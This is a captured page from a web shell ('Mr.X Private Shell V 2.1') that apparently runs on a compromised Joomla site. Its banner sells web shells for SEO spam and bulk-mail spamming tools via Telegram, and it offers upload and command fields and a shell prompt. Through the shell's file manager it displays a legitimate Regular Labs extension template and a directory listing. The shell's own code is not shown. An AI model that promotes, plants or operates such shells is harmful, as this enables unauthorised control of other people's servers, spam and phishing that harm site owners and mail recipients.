__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package         Regular Labs Extension Manager
 * @version         9.1.0
 * 
 * @author          Peter van Westen <[email protected]>
 * @link            https://regularlabs.com
 * @copyright       Copyright © 2025 Regular Labs All Rights Reserved
 * @license         GNU General Public License version 2 or later
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory as JFactory;
use Joomla\CMS\Language\Text as JText;
use Joomla\CMS\Layout\LayoutHelper as JLayoutHelper;

if (JFactory::getApplication()->isClient('site'))
{
    die();
}

$extensions = JFactory::getApplication()->getSession()->get('rlem-results', []);

$failed  = [];
$success = [];

foreach ($extensions as $item)
{
    if ($item->has_error)
    {
        $failed[] = $item;
        continue;
    }

    $success[] = $item;
}
?>
<h2>
    <?php echo JText::_('RLEM_OVERVIEW'); ?>
</h2>

<?php if (count($failed)): ?>

    <div class="card mb-4 border-2 border-danger">

        <h3 class="card-header bg-danger text-white rounded-0 align-items-center">
            <span class="icon-warning text-white me-2" aria-hidden="true"></span>
            <?php echo JText::_('RLEM_FAILED'); ?>
        </h3>

        <div class="card-body rl-bg-danger-light">
            <?php echo JLayoutHelper::render('button.retry'); ?>

            <?php foreach ($failed as $item): ?>
                <?php echo JLayoutHelper::render('card.result', compact('item')); ?>
            <?php endforeach; ?>
        </div>

    </div>
<?php endif; ?>

<?php foreach ($success as $item): ?>
    <?php echo JLayoutHelper::render('card.result', compact('item')); ?>
<?php endforeach; ?>

Filemanager

Name Type Size Permission Actions
default.php File 1.61 KB 0664
downgrade.php File 1.66 KB 0664
install.php File 1.66 KB 0664
reinstall.php File 1.66 KB 0664
uninstall.php File 1.66 KB 0664
update.php File 1.66 KB 0664
Filemanager